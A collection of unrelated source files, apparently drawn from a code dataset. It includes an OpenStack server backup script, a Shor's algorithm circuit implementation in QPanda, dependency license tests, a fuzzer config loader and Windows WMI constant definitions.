from credentials import get_keystone_creds
from credentials import get_nova_creds
from dest_credentials import get_dest_keystone_creds
from dest_credentials import get_dest_nova_creds
class Auth(object):
def __init__(self):
self.kcreds = get_keystone_creds()
self.keystone = ksclient.Client(**self.kcreds)
self.ncreds = get_nova_creds()
self.nova = novaclient.Client("1.1",**self.ncreds)
self.glance_endpoint = self.keystone.service_catalog.url_for(service_type='image',endpoint_type='publicURL')
self.glance = glanceclient.Client('1',self.glance_endpoint, token=self.keystone.auth_token)
class Images(Auth):
script_path = os.path.dirname(os.path.abspath(__file__))
logfile = "{0}/dr.log".format(script_path)
logging.basicConfig(level=logging.INFO,format='%(asctime)s %(levelname)-8s %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=logfile)
def __init__(self):
super(Images, self).__init__()
self.servers = self.nova.servers.list()
self.mysql = db.Database()
def get_property(self,id):
property = self.glance.images.get(id)
return property
def backup_server(self,**kwargs):
"""Backup all running servers."""
self.nova.servers.backup(kwargs['server_id'], kwargs['backup_name'], kwargs['backup_type'], kwargs['rotation'])
def make_backup_dir(self):
if not os.path.exists("{0}/backups".format( self.script_path )):
os.makedirs("backups")
else: return
def prepared_list(self):
get_imags = self.glance.images.list()
get_servers = self.nova.servers.list()
images_names_list = []
for img in get_imags:
images_names_list.append(img.name)
servers_names_list = []
for srvr in get_servers:
servers_names_list.append(srvr.name+"_backup")
down_list = [elem for elem in images_names_list if elem in servers_names_list]
get_imags_casted = self.glance.images.list()
imagss_list = list(get_imags_casted)
result = []
for x in xrange(0,len(down_list)):
server_name = down_list[x]
for y in xrange(0,len(imagss_list)):
imgs_name = imagss_list[y].name
if server_name == imgs_name:
imgs_id = imagss_list[y].id
rs_img = {}
rs_img['name'] = imgs_name
rs_img['id'] = imgs_id
list_imgg = [rs_img]
get_img = self.glance.images.get(imgs_id)
while get_img.status != 'active':
sleep(5)
get_imgg = self.glance.images.get(imgs_id)
if get_imgg.status == 'active':
break
rs_img['disk_format'] = get_img.disk_format
rs_img['container_format'] = get_img.container_format
rs_img['is_public'] = get_img.is_public
rs_img['img_path'] = self.script_path+"/backups/"+imgs_name+".img"
rs_img['exc'] = self.script_path
result.append(list_imgg)
break
return result
def download_image(self,**kwargs):
"""Download images using glance client."""
image_name = kwargs['image_name'].replace (" ", "_")
try:
os.chdir(kwargs['down_path'])
except OSError as e:
logging.warning(e)
if kwargs['is_ami']:
if kwargs['aki']=='aki':
print "AKI"
cmd = "glance image-download %s >> %s-vmlinuz" %(kwargs['kernel_id'],image_name)
os.system(cmd)
if kwargs['ari']=='ari':
print "ARI"
cmd = "glance image-download %s >> %s-loader" %(kwargs['ramdisk_id'],image_name)
os.system(cmd)
print "AMI"
cmd = "glance image-download %s >> %s.img" %(kwargs['image_id'],image_name)
os.system(cmd)
else:
print"Not ami"
cmd = "glance image-download %s >> %s.img" %(kwargs['image_id'],image_name)
os.system(cmd)
def upload_img(self,**kwargs):
"""Upload image to destination glance."""
with open(kwargs['img_path']) as fimage:
self.glance.images.create(name=kwargs['img_name'], is_public=kwargs['is_public'], disk_format=kwargs['disk_format'],container_format=kwargs['container_format'], data=fimage)
def get_backup_id(self,images):
ids=[]
for x in xrange(0,len(images)):
ids.append(images[x][0]['id'])
return ids
def execute_backups(self,backup_list=None):
backup_vars = {}
if backup_list is None:
servers_list = self.nova.servers.list()
else:
servers_list = backup_list
for i in xrange(0,len(servers_list)):
check = self.mysql.check_image_exists(self.keystone.tenant_id, servers_list[i].id)
if not check :
logging.info("No servers")
if servers_list[i].status == 'ACTIVE':
backup_vars['server_id'] = servers_list[i].id
backup_vars['backup_name'] = "{0}_backup".format(servers_list[i].name)
backup_vars['backup_type'] = 'daily'
backup_vars['rotation'] = 1
self.backup_server(**backup_vars)
self.print_format("Backing up... {0}".format(servers_list[i].name ))
logging.info("Backing up... {0}".format(servers_list[i].name ))
self.mysql.insert_data(self.keystone.tenant_id,self.keystone.username,servers_list[i].id,'',servers_list[i].name)
else:
self.print_format("{0} is not active and will be ignored".format(servers_list[i].name ))
else:
logging.info("pass")
def update_backup(self,backup_list=None):
backup_vars = {}
if backup_list is None:
servers_list = self.nova.servers.list()
else:
servers_list = backup_list
for i in xrange(0,len(servers_list)):
if servers_list[i].status == 'ACTIVE':
backup_vars['server_id'] = servers_list[i].id
backup_vars['backup_name'] = "{0}_backup".format(servers_list[i].name)
backup_vars['backup_type'] = 'daily'
backup_vars['rotation'] = 1
self.backup_server(**backup_vars)
self.print_format("Backing up... {0}".format(servers_list[i].name ))
logging.info("Backing up... {0}".format(servers_list[i].name ))
self.mysql.insert_data(self.keystone.tenant_id,self.keystone.username,servers_list[i].id,'',servers_list[i].name)
else:
self.print_format("{0} is not active and will be ignored".format(servers_list[i].name ))
def print_format(self,string):
print "+%s+" %("-" * len(string))
print "|%s|" % string
print "+%s+" %("-" * len(string))
def get_meta_and_return_servers(self):
meta = []
_servers = self.nova.servers.list()
for srvrs in _servers:
rs = {}
gets = self.nova.servers.get(srvrs.id)
rs['dr'] = gets.metadata.values()
rs['id'] = srvrs.id
meta_list = [rs]
meta.append(meta_list)
res = [k for k in meta if '1' in k[0]['dr']]
servers =[]
for i in xrange(0,len(res)):
get_servers = self.nova.servers.get(res[i][0]['id'])
servers.append(get_servers)
return servers
if __name__ == "__main__":
obj=Images()
if not obj.prepared_list():
obj.print_format("First backup...")
if not obj.get_meta_and_return_servers():
logging.info("No custom servers list")
obj.execute_backups()
else:
logging.info("custom servers list with dr key")
obj.execute_backups(obj.get_meta_and_return_servers())
else:
obj.print_format("Updating backups...")
backup_list_index = obj.get_backup_id(obj.prepared_list())
for x in xrange(0,len( backup_list_index )):
obj.glance.images.delete(backup_list_index[x])
obj.mysql.delete_data(obj.keystone.tenant_id)
if not obj.get_meta_and_return_servers():
logging.info("No custom servers list")
obj.execute_backups()
else:
logging.info("custom servers list with dr key")
obj.execute_backups(obj.get_meta_and_return_servers())
``` |
{
"source": "4HMZ4/gAssistBot",
"score": 2
} |
#### File: gAssistBot/lib/getToken.py
```python
def getToken():
with open("./token", "r") as f:
token = f.read()
f.close()
return token
``` |
{
"source": "4ier/QPanda-2",
"score": 3
} |
#### File: QPanda-2/pyQPanda/ShorTest.py
```python
from pyqpanda import *
import matplotlib.pyplot as plt
import math as m
def plotBar(xdata, ydata):
fig, ax = plt.subplots()
fig.set_size_inches(6,6)
fig.set_dpi(100)
rects = ax.bar(xdata, ydata, color='b')
for rect in rects:
height = rect.get_height()
plt.text(rect.get_x() + rect.get_width() / 2, height, str(height), ha="center", va="bottom")
plt.rcParams['font.sans-serif']=['Arial']
plt.title("Origin Q", loc='right', alpha = 0.5)
plt.ylabel('Times')
plt.xlabel('States')
plt.show()
def reorganizeData(measure_qubits, quick_meausre_result):
xdata = []
ydata = []
for i in quick_meausre_result:
xdata.append(i)
ydata.append(quick_meausre_result[i])
return xdata, ydata
def gcd(m,n):
if not n:
return m
else:
return gcd(n, m%n)
def MAJ(a, b, c):
circ = QCircuit()
circ.insert(CNOT(c,b))
circ.insert(CNOT(c,a))
circ.insert(Toffoli(a, b, c))
return circ
# def Adder(a, b, c):
# circuit = CreateEmptyCircuit()
# nbit = len(a)
# circuit.insert(MAJ(c, a[0], b[0]))
# for i in range(1,nbit,1):
# circuit.insert(MAJ(b[i - 1], a[i], b[i]))
# for i in range(nbit-1,0, - 1):
# circuit.insert(MAJ(b[i - 1], a[i], b[i]))
# circuit.insert(UMA(c, a[0], b[0]))
# return circuit
def UMA(a, b, c):
circ = QCircuit()
circ.insert(Toffoli(a, b, c)).insert(CNOT(c, a)).insert(CNOT(a, b))
return circ
def MAJ2(a, b, c):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
nbit = len(a)
circ = QCircuit()
circ.insert(MAJ(c, a[0], b[0]))
for i in range(1, nbit):
circ.insert(MAJ(b[i-1], a[i], b[i]))
return circ
def Adder(a, b, c):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
nbit = len(a)
circ = QCircuit()
circ.insert(MAJ(c, a[0], b[0]))
for i in range(1, nbit):
circ.insert(MAJ(b[i-1], a[i], b[i]))
for i in range(nbit-1, 0, -1):
circ.insert(UMA(b[i-1], a[i], b[i]))
circ.insert(UMA(c, a[0], b[0]))
return circ
def isCarry(a, b, c, carry):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
circ = QCircuit()
circ.insert(MAJ2(a, b, c))
circ.insert(CNOT(b[-1], carry))
circ.insert(MAJ2(a, b, c).dagger())
return circ
def bindData(qlist, data):
check_value = 1 << len(qlist)
if (data >= check_value):
raise RuntimeError('data >= check_value')
circ = QCircuit()
i = 0
while (data >= 1):
if (data % 2) == 1:
circ.insert(X(qlist[i]))
data = data >> 1
i = i+1
return circ
def isCarry(a, b, c, carry):
if ((len(a) == 0) or (len(a) != (len(b)))):
raise RuntimeError('a and b must be equal, but not equal to 0!')
circ = QCircuit()
circ.insert(MAJ2(a, b, c))
circ.insert(CNOT(b[-1], carry))
circ.insert(MAJ2(a, b, c).dagger())
return circ
def constModAdd(qa, C, M, qb, qs1):
circ = QCircuit()
q_num = len(qa)
tmp_value = (1 << q_num) - M + C
circ.insert(bindData(qb, tmp_value))
circ.insert(isCarry(qa, qb, qs1[1], qs1[0]))
circ.insert(bindData(qb, tmp_value))
tmp_circ = QCircuit()
tmp_circ.insert(bindData(qb, tmp_value))
tmp_circ.insert(Adder(qa, qb, qs1[1]))
tmp_circ.insert(bindData(qb, tmp_value))
tmp_circ = tmp_circ.control([qs1[0]])
circ.insert(tmp_circ)
circ.insert(X(qs1[0]))
tmp2_circ = QCircuit()
tmp2_circ.insert(bindData(qb, C))
tmp2_circ.insert(Adder(qa, qb, qs1[1]))
tmp2_circ.insert(bindData(qb, C))
tmp2_circ = tmp2_circ.control([qs1[0]])
circ.insert(tmp2_circ)
circ.insert(X(qs1[0]))
tmp_value = (1 << q_num) - C
circ.insert(bindData(qb, tmp_value))
circ.insert(isCarry(qa, qb, qs1[1], qs1[0]))
circ.insert(bindData(qb, tmp_value))
circ.insert(X(qs1[0]))
return circ
def modreverse(c, m):
if (c == 0):
raise RecursionError('c is zero!')
if (c == 1):
return 1
m1 = m
quotient = []
quo = m // c
remainder = m % c
quotient.append(quo)
while (remainder != 1):
m = c
c = remainder
quo = m // c
remainder = m % c
quotient.append(quo)
if (len(quotient) == 1):
return m - quo
if (len(quotient) == 2):
return 1 + quotient[0]*quotient[1]
rev1 = 1
rev2 = quotient[-1]
reverse_list = quotient[0:-1]
reverse_list.reverse()
for i in reverse_list:
rev1 = rev1 + rev2 * i
temp = rev1
rev1 = rev2
rev2 = temp
if ((len(quotient) % 2) == 0):
return rev2
return m1 - rev2
def constModMul(qa, const_num, M, qs1, qs2, qs3):
circ = QCircuit()
q_num = len(qa)
for i in range(0, q_num):
tmp_circ = QCircuit()
tmp = const_num * pow(2, i) %M
tmp_circ.insert(constModAdd(qs1, tmp, M, qs2, qs3))
tmp_circ = tmp_circ.control([qa[i]])
circ.insert(tmp_circ)
#state swap
for i in range(0, q_num):
circ.insert(CNOT(qa[i], qs1[i]))
circ.insert(CNOT(qs1[i], qa[i]))
circ.insert(CNOT(qa[i], qs1[i]))
Crev = modreverse(const_num, M)
tmp2_circ = QCircuit()
for i in range(0, q_num):
tmp = Crev* pow(2, i)
tmp = tmp % M
tmp_circ = QCircuit()
tmp_circ.insert(constModAdd(qs1, tmp, M, qs2, qs3))
tmp_circ = tmp_circ.control([qa[i]])
tmp2_circ.insert(tmp_circ)
circ.insert(tmp2_circ.dagger())
return circ
def constModExp(qa, qb, base, M, qs1, qs2, qs3):
circ = QCircuit()
cqnum = len(qa)
temp = base
for i in range(0, cqnum):
circ.insert(constModMul(qb, temp, M, qs1, qs2, qs3).control([qa[i]]))
temp = temp * temp
temp = temp % M
return circ
def qft(qlist):
circ = QCircuit()
qnum = len(qlist)
for i in range(0, qnum):
circ.insert(H(qlist[qnum-1-i]))
for j in range(i + 1, qnum):
circ.insert(CR(qlist[qnum-1-j], qlist[qnum-1-i], m.pi/(1 << (j-i))))
for i in range(0, qnum//2):
circ.insert(CNOT(qlist[i], qlist[qnum-1-i]))
circ.insert(CNOT(qlist[qnum-1-i], qlist[i]))
circ.insert(CNOT(qlist[i], qlist[qnum-1-i]))
return circ
def shorAlg(base, M):
if ((base < 2) or (base > M - 1)):
raise('Invalid base!')
if (gcd(base, M) != 1):
raise('Invalid base! base and M must be mutually prime')
binary_len = 0
while M >> binary_len != 0 :
binary_len = binary_len + 1
machine = init_quantum_machine(QMachineType.CPU_SINGLE_THREAD)
qa = machine.qAlloc_many(binary_len*2)
qb = machine.qAlloc_many(binary_len)
qs1 = machine.qAlloc_many(binary_len)
qs2 = machine.qAlloc_many(binary_len)
qs3 = machine.qAlloc_many(2)
prog = QProg()
prog.insert(X(qb[0]))
prog.insert(single_gate_apply_to_all(H, qa))
prog.insert(constModExp(qa, qb, base, M, qs1, qs2, qs3))
prog.insert(qft(qa).dagger())
directly_run(prog)
result = quick_measure(qa, 100)
print(result)
xdata, ydata = reorganizeData(qa, result)
plotBar(xdata, ydata)
return result
if __name__=="__main__":
base = 2
N = 15
shorAlg(base, N)
``` |
{
"source": "4jinetes/dep-scan",
"score": 2
} |
#### File: dep-scan/test/test_license.py
```python
import os
import pytest
from depscan.lib.bom import get_pkg_list
from depscan.lib.license import build_license_data, bulk_lookup
from depscan.lib import analysis as analysis
@pytest.fixture
def test_license_data():
licenses_dir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..",
"vendor",
"choosealicense.com",
"_licenses",
)
spdx_license_list = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"..",
"vendor",
"spdx",
"json",
"licenses.json",
)
return build_license_data(licenses_dir, spdx_license_list)
def test_lookup(test_license_data):
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-dotnet.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
violations_list = []
for pkg, ll in pkg_lic_dict.items():
for lic in ll:
if lic["condition_flag"]:
violations_list.append(lic)
assert len(violations_list) == 1
def test_dual_license(test_license_data):
pkg_lic_dict = bulk_lookup(
test_license_data,
[
{
"vendor": "npm",
"name": "jszip",
"version": "3.2.2",
"licenses": ["(MIT OR GPL-3.0)"],
}
],
)
assert pkg_lic_dict == {
"npm:[email protected]": [
{
"title": "MIT License",
"spdx-id": "MIT",
"featured": True,
"hidden": False,
"description": "A short and simple permissive license with conditions only requiring preservation of copyright and license notices. Licensed works, modifications, and larger works may be distributed under different terms and without source code.",
"how": "Create a text file (typically named LICENSE or LICENSE.txt) in the root of your source code and copy the text of the license into the file. Replace [year] with the current year and [fullname] with the name (or names) of the copyright holders.",
"using": {
"Babel": "https://github.com/babel/babel/blob/master/LICENSE",
".NET Core": "https://github.com/dotnet/runtime/blob/master/LICENSE.TXT",
"Rails": "https://github.com/rails/rails/blob/master/MIT-LICENSE",
},
"permissions": [
"commercial-use",
"modifications",
"distribution",
"private-use",
],
"conditions": ["include-copyright"],
"limitations": ["liability", "warranty"],
"condition_flag": False,
}
]
}
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-node2.xml"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
def test_large_lookup(test_license_data):
test_bom = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "data", "bom-docker.json"
)
pkg_list = get_pkg_list(test_bom)
pkg_lic_dict = bulk_lookup(test_license_data, pkg_list)
assert pkg_lic_dict
analysis.analyse_licenses("nodejs", pkg_lic_dict)
def test_unvendor_license(test_license_data):
pkg_lic_dict = bulk_lookup(
test_license_data,
[
{
"vendor": "npm",
"name": "jszip",
"version": "3.2.2",
"licenses": ["CC-BY-NC-1.0"],
}
],
)
assert pkg_lic_dict == {
"npm:[email protected]": [
{
"title": "Creative Commons Attribution Non Commercial 1.0 Generic",
"spdx-id": "CC-BY-NC-1.0",
"osi_approved": False,
"fsf_libre": False,
"conditions": ["See https://spdx.org/licenses/CC-BY-NC-1.0.json"],
"condition_flag": True,
}
]
}
``` |
{
"source": "4k1/wufuzzer",
"score": 2
} |
#### File: wufuzzer/src/config.py
```python
import yaml
class ConfigFile():
yml = None
last_confid = "default"
def get_yml(self):
return self.yml
def load_config(self):
confs = []
# load config
try:
f = open("wufuzzer.yml")
self.yml = yaml.load(f, Loader=yaml.SafeLoader)
f.close()
except:
print ("[-] Missing config to read 'wufuzzer.yml'.")
exit(-1)
# check version
if str(self.get_config("version", "1")) != "2":
print ("[-] Configuration 'wufuzzer.yml' version mismatch. version = " + str(get_config("version", "1")))
exit(-1)
def get_config(self, key, default=None):
if key in self.yml["core"]:
if type(self.yml["core"][key]) is int:
return int(self.yml["core"][key])
else:
return str(self.yml["core"][key])
elif default == None:
raise
else:
return default
def is_exists_user_config(self, confid):
try:
_ = self.yml["config"][confid]
self.last_confid = confid
return True
except:
return False
def get_user_config(self, key, default=None):
if self.yml["config"][self.last_confid] == None:
None
elif key in self.yml["config"][self.last_confid]:
return self.yml["config"][self.last_confid][key]
if default == None:
raise
else:
return default
``` |
{
"source": "4k4xs4pH1r3/cWMI",
"score": 2
} |
#### File: cWMI/cwmi/winapi.py
```python
import ctypes
from ctypes import wintypes
from .wintype import HRESULT, BSTR
PSHORT = ctypes.POINTER(wintypes.SHORT)
PUSHORT = ctypes.POINTER(wintypes.USHORT)
LPLONG = ctypes.POINTER(wintypes.LONG)
PULONG = ctypes.POINTER(wintypes.ULONG)
CHAR = ctypes.c_char
PCHAR = ctypes.POINTER(CHAR)
_In_ = 1
_Out_ = 2
WBEM_FLAG_RETURN_IMMEDIATELY = 0x10
WBEM_FLAG_RETURN_WBEM_COMPLETE = 0
WBEM_FLAG_BIDIRECTIONAL = 0
WBEM_FLAG_FORWARD_ONLY = 0x20
WBEM_FLAG_NO_ERROR_OBJECT = 0x40
WBEM_FLAG_RETURN_ERROR_OBJECT = 0
WBEM_FLAG_SEND_STATUS = 0x80
WBEM_FLAG_DONT_SEND_STATUS = 0
WBEM_FLAG_ENSURE_LOCATABLE = 0x100
WBEM_FLAG_DIRECT_READ = 0x200
WBEM_FLAG_SEND_ONLY_SELECTED = 0
WBEM_RETURN_WHEN_COMPLETE = 0
WBEM_RETURN_IMMEDIATELY = 0x10
WBEM_MASK_RESERVED_FLAGS = 0x1f000
WBEM_FLAG_USE_AMENDED_QUALIFIERS = 0x20000
WBEM_FLAG_STRONG_VALIDATION = 0x10000
WBEM_NO_WAIT = 0
WBEM_INFINITE = 0xFFFFFFFF
WBEM_FLAG_ALWAYS = 0
WBEM_FLAG_ONLY_IF_TRUE = 0x1
WBEM_FLAG_ONLY_IF_FALSE = 0x2
WBEM_FLAG_ONLY_IF_IDENTICAL = 0x3
WBEM_MASK_PRIMARY_CONDITION = 0x3
WBEM_FLAG_KEYS_ONLY = 0x4
WBEM_FLAG_REFS_ONLY = 0x8
WBEM_FLAG_LOCAL_ONLY = 0x10
WBEM_FLAG_PROPAGATED_ONLY = 0x20
WBEM_FLAG_SYSTEM_ONLY = 0x30
WBEM_FLAG_NONSYSTEM_ONLY = 0x40
WBEM_MASK_CONDITION_ORIGIN = 0x70
WBEM_FLAG_CLASS_OVERRIDES_ONLY = 0x100
WBEM_FLAG_CLASS_LOCAL_AND_OVERRIDES = 0x200
WBEM_MASK_CLASS_CONDITION = 0x300
WBEM_NO_ERROR = 0
WBEM_S_NO_ERROR = 0
WBEM_S_SAME = 0
WBEM_S_FALSE = 1
WBEM_S_ALREADY_EXISTS = 0x40001
WBEM_S_RESET_TO_DEFAULT = 0x40002
WBEM_S_DIFFERENT = 0x40003
WBEM_S_TIMEDOUT = 0x40004
WBEM_S_NO_MORE_DATA = 0x40005
WBEM_S_OPERATION_CANCELLED = 0x40006
WBEM_S_PENDING = 0x40007
WBEM_S_DUPLICATE_OBJECTS = 0x40008
WBEM_S_ACCESS_DENIED = 0x40009
WBEM_S_PARTIAL_RESULTS = 0x40010
WBEM_S_SOURCE_NOT_AVAILABLE = 0x40017
WBEM_E_FAILED = 0x80041001
WBEM_E_NOT_FOUND = 0x80041002
WBEM_E_ACCESS_DENIED = 0x80041003
WBEM_E_PROVIDER_FAILURE = 0x80041004
WBEM_E_TYPE_MISMATCH = 0x80041005
WBEM_E_OUT_OF_MEMORY = 0x80041006
WBEM_E_INVALID_CONTEXT = 0x80041007
WBEM_E_INVALID_PARAMETER = 0x80041008
WBEM_E_NOT_AVAILABLE = 0x80041009
WBEM_E_CRITICAL_ERROR = 0x8004100a
WBEM_E_INVALID_STREAM = 0x8004100b
WBEM_E_NOT_SUPPORTED = 0x8004100c
WBEM_E_INVALID_SUPERCLASS = 0x8004100d
WBEM_E_INVALID_NAMESPACE = 0x8004100e
WBEM_E_INVALID_OBJECT = 0x8004100f
WBEM_E_INVALID_CLASS = 0x80041010
WBEM_E_PROVIDER_NOT_FOUND = 0x80041011
WBEM_E_INVALID_PROVIDER_REGISTRATION = 0x80041012
WBEM_E_PROVIDER_LOAD_FAILURE = 0x80041013
WBEM_E_INITIALIZATION_FAILURE = 0x80041014
WBEM_E_TRANSPORT_FAILURE = 0x80041015
WBEM_E_INVALID_OPERATION = 0x80041016
WBEM_E_INVALID_QUERY = 0x80041017
WBEM_E_INVALID_QUERY_TYPE = 0x80041018
WBEM_E_ALREADY_EXISTS = 0x80041019
WBEM_E_OVERRIDE_NOT_ALLOWED = 0x8004101a
WBEM_E_PROPAGATED_QUALIFIER = 0x8004101b
WBEM_E_PROPAGATED_PROPERTY = 0x8004101c
WBEM_E_UNEXPECTED = 0x8004101d
WBEM_E_ILLEGAL_OPERATION = 0x8004101e
WBEM_E_CANNOT_BE_KEY = 0x8004101f
WBEM_E_INCOMPLETE_CLASS = 0x80041020
WBEM_E_INVALID_SYNTAX = 0x80041021
WBEM_E_NONDECORATED_OBJECT = 0x80041022
WBEM_E_READ_ONLY = 0x80041023
WBEM_E_PROVIDER_NOT_CAPABLE = 0x80041024
WBEM_E_CLASS_HAS_CHILDREN = 0x80041025
WBEM_E_CLASS_HAS_INSTANCES = 0x80041026
WBEM_E_QUERY_NOT_IMPLEMENTED = 0x80041027
WBEM_E_ILLEGAL_NULL = 0x80041028
WBEM_E_INVALID_QUALIFIER_TYPE = 0x80041029
WBEM_E_INVALID_PROPERTY_TYPE = 0x8004102a
WBEM_E_VALUE_OUT_OF_RANGE = 0x8004102b
WBEM_E_CANNOT_BE_SINGLETON = 0x8004102c
WBEM_E_INVALID_CIM_TYPE = 0x8004102d
WBEM_E_INVALID_METHOD = 0x8004102e
WBEM_E_INVALID_METHOD_PARAMETERS = 0x8004102f
WBEM_E_SYSTEM_PROPERTY = 0x80041030
WBEM_E_INVALID_PROPERTY = 0x80041031
WBEM_E_CALL_CANCELLED = 0x80041032
WBEM_E_SHUTTING_DOWN = 0x80041033
WBEM_E_PROPAGATED_METHOD = 0x80041034
WBEM_E_UNSUPPORTED_PARAMETER = 0x80041035
WBEM_E_MISSING_PARAMETER_ID = 0x80041036
WBEM_E_INVALID_PARAMETER_ID = 0x80041037
WBEM_E_NONCONSECUTIVE_PARAMETER_IDS = 0x80041038
WBEM_E_PARAMETER_ID_ON_RETVAL = 0x80041039
WBEM_E_INVALID_OBJECT_PATH = 0x8004103a
WBEM_E_OUT_OF_DISK_SPACE = 0x8004103b
WBEM_E_BUFFER_TOO_SMALL = 0x8004103c
WBEM_E_UNSUPPORTED_PUT_EXTENSION = 0x8004103d
WBEM_E_UNKNOWN_OBJECT_TYPE = 0x8004103e
WBEM_E_UNKNOWN_PACKET_TYPE = 0x8004103f
WBEM_E_MARSHAL_VERSION_MISMATCH = 0x80041040
WBEM_E_MARSHAL_INVALID_SIGNATURE = 0x80041041
WBEM_E_INVALID_QUALIFIER = 0x80041042
WBEM_E_INVALID_DUPLICATE_PARAMETER = 0x80041043
WBEM_E_TOO_MUCH_DATA = 0x80041044
WBEM_E_SERVER_TOO_BUSY = 0x80041045
WBEM_E_INVALID_FLAVOR = 0x80041046
WBEM_E_CIRCULAR_REFERENCE = 0x80041047
WBEM_E_UNSUPPORTED_CLASS_UPDATE = 0x80041048
WBEM_E_CANNOT_CHANGE_KEY_INHERITANCE = 0x80041049
WBEM_E_CANNOT_CHANGE_INDEX_INHERITANCE = 0x80041050
WBEM_E_TOO_MANY_PROPERTIES = 0x80041051
WBEM_E_UPDATE_TYPE_MISMATCH = 0x80041052
WBEM_E_UPDATE_OVERRIDE_NOT_ALLOWED = 0x80041053
WBEM_E_UPDATE_PROPAGATED_METHOD = 0x80041054
WBEM_E_METHOD_NOT_IMPLEMENTED = 0x80041055
WBEM_E_METHOD_DISABLED = 0x80041056
WBEM_E_REFRESHER_BUSY = 0x80041057
WBEM_E_UNPARSABLE_QUERY = 0x80041058
WBEM_E_NOT_EVENT_CLASS = 0x80041059
WBEM_E_MISSING_GROUP_WITHIN = 0x8004105a
WBEM_E_MISSING_AGGREGATION_LIST = 0x8004105b
WBEM_E_PROPERTY_NOT_AN_OBJECT = 0x8004105c
WBEM_E_AGGREGATING_BY_OBJECT = 0x8004105d
WBEM_E_UNINTERPRETABLE_PROVIDER_QUERY = 0x8004105f
WBEM_E_BACKUP_RESTORE_WINMGMT_RUNNING = 0x80041060
WBEM_E_QUEUE_OVERFLOW = 0x80041061
WBEM_E_PRIVILEGE_NOT_HELD = 0x80041062
WBEM_E_INVALID_OPERATOR = 0x80041063
WBEM_E_LOCAL_CREDENTIALS = 0x80041064
WBEM_E_CANNOT_BE_ABSTRACT = 0x80041065
WBEM_E_AMENDED_OBJECT = 0x80041066
WBEM_E_CLIENT_TOO_SLOW = 0x80041067
WBEM_E_NULL_SECURITY_DESCRIPTOR = 0x80041068
WBEM_E_TIMED_OUT = 0x80041069
WBEM_E_INVALID_ASSOCIATION = 0x8004106a
WBEM_E_AMBIGUOUS_OPERATION = 0x8004106b
WBEM_E_QUOTA_VIOLATION = 0x8004106c
WBEM_E_RESERVED_001 = 0x8004106d
WBEM_E_RESERVED_002 = 0x8004106e
WBEM_E_UNSUPPORTED_LOCALE = 0x8004106f
WBEM_E_HANDLE_OUT_OF_DATE = 0x80041070
WBEM_E_CONNECTION_FAILED = 0x80041071
WBEM_E_INVALID_HANDLE_REQUEST = 0x80041072
WBEM_E_PROPERTY_NAME_TOO_WIDE = 0x80041073
WBEM_E_CLASS_NAME_TOO_WIDE = 0x80041074
WBEM_E_METHOD_NAME_TOO_WIDE = 0x80041075
WBEM_E_QUALIFIER_NAME_TOO_WIDE = 0x80041076
WBEM_E_RERUN_COMMAND = 0x80041077
WBEM_E_DATABASE_VER_MISMATCH = 0x80041078
WBEM_E_VETO_DELETE = 0x80041079
WBEM_E_VETO_PUT = 0x8004107a
WBEM_E_INVALID_LOCALE = 0x80041080
WBEM_E_PROVIDER_SUSPENDED = 0x80041081
WBEM_E_SYNCHRONIZATION_REQUIRED = 0x80041082
WBEM_E_NO_SCHEMA = 0x80041083
WBEM_E_PROVIDER_ALREADY_REGISTERED = 0x80041084
WBEM_E_PROVIDER_NOT_REGISTERED = 0x80041085
WBEM_E_FATAL_TRANSPORT_ERROR = 0x80041086
WBEM_E_ENCRYPTED_CONNECTION_REQUIRED = 0x80041087
WBEM_E_PROVIDER_TIMED_OUT = 0x80041088
WBEM_E_NO_KEY = 0x80041089
WBEM_E_PROVIDER_DISABLED = 0x8004108a
WBEMESS_E_REGISTRATION_TOO_BROAD = 0x80042001
WBEMESS_E_REGISTRATION_TOO_PRECISE = 0x80042002
WBEMESS_E_AUTHZ_NOT_PRIVILEGED = 0x80042003
WBEMMOF_E_EXPECTED_QUALIFIER_NAME = 0x80044001
WBEMMOF_E_EXPECTED_SEMI = 0x80044002
WBEMMOF_E_EXPECTED_OPEN_BRACE = 0x80044003
WBEMMOF_E_EXPECTED_CLOSE_BRACE = 0x80044004
WBEMMOF_E_EXPECTED_CLOSE_BRACKET = 0x80044005
WBEMMOF_E_EXPECTED_CLOSE_PAREN = 0x80044006
WBEMMOF_E_ILLEGAL_CONSTANT_VALUE = 0x80044007
WBEMMOF_E_EXPECTED_TYPE_IDENTIFIER = 0x80044008
WBEMMOF_E_EXPECTED_OPEN_PAREN = 0x80044009
WBEMMOF_E_UNRECOGNIZED_TOKEN = 0x8004400a
WBEMMOF_E_UNRECOGNIZED_TYPE = 0x8004400b
WBEMMOF_E_EXPECTED_PROPERTY_NAME = 0x8004400c
WBEMMOF_E_TYPEDEF_NOT_SUPPORTED = 0x8004400d
WBEMMOF_E_UNEXPECTED_ALIAS = 0x8004400e
WBEMMOF_E_UNEXPECTED_ARRAY_INIT = 0x8004400f
WBEMMOF_E_INVALID_AMENDMENT_SYNTAX = 0x80044010
WBEMMOF_E_INVALID_DUPLICATE_AMENDMENT = 0x80044011
WBEMMOF_E_INVALID_PRAGMA = 0x80044012
WBEMMOF_E_INVALID_NAMESPACE_SYNTAX = 0x80044013
WBEMMOF_E_EXPECTED_CLASS_NAME = 0x80044014
WBEMMOF_E_TYPE_MISMATCH = 0x80044015
WBEMMOF_E_EXPECTED_ALIAS_NAME = 0x80044016
WBEMMOF_E_INVALID_CLASS_DECLARATION = 0x80044017
WBEMMOF_E_INVALID_INSTANCE_DECLARATION = 0x80044018
